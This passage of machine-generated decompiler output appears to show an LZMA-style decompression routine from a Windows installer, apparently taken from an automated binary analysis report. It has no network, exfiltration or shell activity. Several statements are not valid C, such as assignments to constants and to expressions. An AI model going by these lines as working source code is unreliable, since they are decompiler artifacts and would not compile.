                                                                                    				void _t533;
                                                                                    				signed int _t534;
                                                                                    				signed int _t535;
                                                                                    				signed int _t565;
                                                                                    				signed int _t568;
                                                                                    				signed int _t589;
                                                                                    				signed int* _t606;
                                                                                    				void* _t613;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                                    						 *(_t613 - 0x84) = 0xa;
                                                                                    						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                    					} else {
                                                                                    						 *(__ebp - 0x84) = 9;
                                                                                    						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    					}
                                                                                    					while(1) {
                                                                                    						 *(_t613 - 0x54) = _t606;
                                                                                    						while(1) {
                                                                                    							L133:
                                                                                    							_t531 =  *_t606;
                                                                                    							_t589 = _t531 & 0x0000ffff;
                                                                                    							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                    							if( *(_t613 - 0xc) >= _t565) {
                                                                                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                    								 *(_t613 - 0x40) = 1;
                                                                                    								_t532 = _t531 - (_t531 >> 5);
                                                                                    								 *_t606 = _t532;
                                                                                    							} else {
                                                                                    								 *(_t613 - 0x10) = _t565;
                                                                                    								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                    							}
                                                                                    							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                    								goto L139;
                                                                                    							}
                                                                                    							L137:
                                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                                    								 *(_t613 - 0x88) = 5;
                                                                                    								L170:
                                                                                    								_t568 = 0x22;
                                                                                    								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                    								_t535 = 0;
                                                                                    								L172:
                                                                                    								return _t535;
                                                                                    							}
                                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    							L139:
                                                                                    							_t533 =  *(_t613 - 0x84);
                                                                                    							while(1) {
                                                                                    								 *(_t613 - 0x88) = _t533;
                                                                                    								while(1) {
                                                                                    									L1:
                                                                                    									_t534 =  *(_t613 - 0x88);
                                                                                    									if(_t534 > 0x1c) {
                                                                                    										break;
                                                                                    									}
                                                                                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                    										case 0:
                                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    											_t534 =  *( *(_t613 - 0x70));
                                                                                    											if(_t534 > 0xe1) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											_t538 = _t534 & 0x000000ff;
                                                                                    											_push(0x2d);
                                                                                    											asm("cdq");
                                                                                    											_pop(_t570);
                                                                                    											_push(9);
                                                                                    											_pop(_t571);
                                                                                    											_t609 = _t538 / _t570;
                                                                                    											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                    											asm("cdq");
                                                                                    											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                    											 *(_t613 - 0x3c) = _t604;
                                                                                    											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                    											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                    											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                    											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                    												L10:
                                                                                    												if(_t612 == 0) {
                                                                                    													L12:
                                                                                    													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    													goto L15;
                                                                                    												} else {
                                                                                    													goto L11;
                                                                                    												}
                                                                                    												do {
                                                                                    													L11:
                                                                                    													_t612 = _t612 - 1;
                                                                                    													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                    												} while (_t612 != 0);
                                                                                    												goto L12;
                                                                                    											}
                                                                                    											if( *(_t613 - 4) != 0) {
                                                                                    												GlobalFree( *(_t613 - 4));
                                                                                    											}
                                                                                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    											 *(_t613 - 4) = _t534;
                                                                                    											if(_t534 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                    												goto L10;
                                                                                    											}
                                                                                    										case 1:
                                                                                    											L13:
                                                                                    											__eflags =  *(_t613 - 0x6c);
                                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                                    												 *(_t613 - 0x88) = 1;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    											_t45 = _t613 - 0x48;
                                                                                    											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                    											__eflags =  *_t45;
                                                                                    											L15:
                                                                                    											if( *(_t613 - 0x48) < 4) {
                                                                                    												goto L13;
                                                                                    											}
                                                                                    											_t546 =  *(_t613 - 0x40);
                                                                                    											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                    												L20:
                                                                                    												 *(_t613 - 0x48) = 5;
                                                                                    												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                    												goto L23;
                                                                                    											}
                                                                                    											 *(_t613 - 0x74) = _t546;
                                                                                    											if( *(_t613 - 8) != 0) {
                                                                                    												GlobalFree( *(_t613 - 8));
                                                                                    											}
                                                                                    											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                    											 *(_t613 - 8) = _t534;
                                                                                    											if(_t534 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												goto L20;
                                                                                    											}
                                                                                    										case 2:
                                                                                    											L24:
                                                                                    											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                    											 *(_t613 - 0x84) = 6;
                                                                                    											 *(_t613 - 0x4c) = _t553;
                                                                                    											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                    											 *(_t613 - 0x54) = _t606;
                                                                                    											goto L133;
                                                                                    										case 3:
                                                                                    											L21:
                                                                                    											__eflags =  *(_t613 - 0x6c);
                                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                                    												 *(_t613 - 0x88) = 3;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    											_t67 = _t613 - 0x70;
                                                                                    											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                    											__eflags =  *_t67;
                                                                                    											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    											L23:
                                                                                    											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                    											if( *(_t613 - 0x48) != 0) {
                                                                                    												goto L21;
                                                                                    											}
                                                                                    											goto L24;
                                                                                    										case 4:
                                                                                    											L133:
                                                                                    											_t531 =  *_t606;
                                                                                    											_t589 = _t531 & 0x0000ffff;
                                                                                    											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                    											if( *(_t613 - 0xc) >= _t565) {
                                                                                    												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                    												 *(_t613 - 0x40) = 1;
                                                                                    												_t532 = _t531 - (_t531 >> 5);
                                                                                    												 *_t606 = _t532;
                                                                                    											} else {
                                                                                    												 *(_t613 - 0x10) = _t565;
                                                                                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                    											}
                                                                                    											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                    												goto L139;
                                                                                    											}
                                                                                    										case 5:
                                                                                    											goto L137;
                                                                                    										case 6:
                                                                                    											__edx = 0;
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) = 1;
                                                                                    												 *(__ebp - 0x84) = 7;
                                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    												while(1) {
                                                                                    													 *(_t613 - 0x54) = _t606;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    											__esi =  *(__ebp - 0x60);
                                                                                    											__cl = 8;
                                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    											__ecx =  *(__ebp - 4);
                                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                                    													_t98 = __ebp - 0x38;
                                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    													__eflags =  *_t98;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x38) = 0;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												goto L61;
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 8);
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												goto L41;
                                                                                    											}
                                                                                    										case 7:
                                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x28);
                                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    												__al = __al & 0x000000fd;
                                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                                    												__eflags = __eax;
                                                                                    												 *(__ebp - 0x58) = __eax;
                                                                                    												goto L69;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											__ecx =  *(__ebp - 0x38);
                                                                                    											 *(__ebp - 0x84) = 8;
                                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    											while(1) {
                                                                                    												 *(_t613 - 0x54) = _t606;
                                                                                    												goto L133;
                                                                                    											}
                                                                                    										case 8:
                                                                                    											goto L0;
                                                                                    										case 9:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												goto L89;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x60);
                                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    											__eflags = _t258;
                                                                                    											0 | _t258 = _t258 + _t258 + 9;
                                                                                    											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                    											goto L75;
                                                                                    										case 0xa:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    												while(1) {
                                                                                    													 *(_t613 - 0x54) = _t606;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x28);
                                                                                    											goto L88;
                                                                                    										case 0xb:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__ecx =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x20);
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x28);
                                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    											L88:
                                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    											L89:
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    											goto L69;
                                                                                    										case 0xc:
                                                                                    											L99:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t334 = __ebp - 0x70;
                                                                                    											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t334;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											goto L101;
                                                                                    										case 0xd:
                                                                                    											L37:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t122 = __ebp - 0x70;
                                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t122;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L39:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    												goto L48;
                                                                                    											}
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												goto L54;
                                                                                    											}
                                                                                    											L41:
                                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    											 *(__ebp - 0x48) = __eax;
                                                                                    											__eax = __eax + 1;
                                                                                    											__eax = __eax << 8;
                                                                                    											__eax = __eax + __ebx;
                                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edx = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												 *(__ebp - 0x40) = 1;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												__ebx = __ebx + __ebx + 1;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edx;
                                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L39;
                                                                                    											} else {
                                                                                    												goto L37;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											L46:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t156 = __ebp - 0x70;
                                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t156;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											while(1) {
                                                                                    												L48:
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													break;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__edx = __ebx + __ebx;
                                                                                    												__ecx =  *(__ebp - 0x10);
                                                                                    												__esi = __edx + __eax;
                                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edi = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													_t170 = __edx + 1; // 0x1
                                                                                    													__ebx = _t170;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edi;
                                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													goto L46;
                                                                                    												}
                                                                                    											}
                                                                                    											L54:
                                                                                    											_t173 = __ebp - 0x34;
                                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    											__eflags =  *_t173;
                                                                                    											goto L55;
                                                                                    										case 0xf:
                                                                                    											L58:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t203 = __ebp - 0x70;
                                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t203;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L60:
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												L55:
                                                                                    												__al =  *(__ebp - 0x44);
                                                                                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    												goto L56;
                                                                                    											}
                                                                                    											L61:
                                                                                    											__eax =  *(__ebp - 0x58);
                                                                                    											__edx = __ebx + __ebx;
                                                                                    											__ecx =  *(__ebp - 0x10);
                                                                                    											__esi = __edx + __eax;
                                                                                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edi = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												_t217 = __edx + 1; // 0x1
                                                                                    												__ebx = _t217;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edi;
                                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L60;
                                                                                    											} else {
                                                                                    												goto L58;
                                                                                    											}
                                                                                    										case 0x10:
                                                                                    											L109:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x10;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t365 = __ebp - 0x70;
                                                                                    											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t365;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											goto L111;
                                                                                    										case 0x11:
                                                                                    											L69:
                                                                                    											__esi =  *(__ebp - 0x58);
                                                                                    											 *(__ebp - 0x84) = 0x12;
                                                                                    											while(1) {
                                                                                    												 *(_t613 - 0x54) = _t606;
                                                                                    												goto L133;
                                                                                    											}
                                                                                    										case 0x12:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												 *(__ebp - 0x84) = 0x13;
                                                                                    												__esi =  *(__ebp - 0x58) + 2;
                                                                                    												while(1) {
                                                                                    													 *(_t613 - 0x54) = _t606;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x4c);
                                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                                    											__eflags = __eax;
                                                                                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    											goto L130;
                                                                                    										case 0x13:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												_t469 = __ebp - 0x58;
                                                                                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    												__eflags =  *_t469;
                                                                                    												 *(__ebp - 0x30) = 0x10;
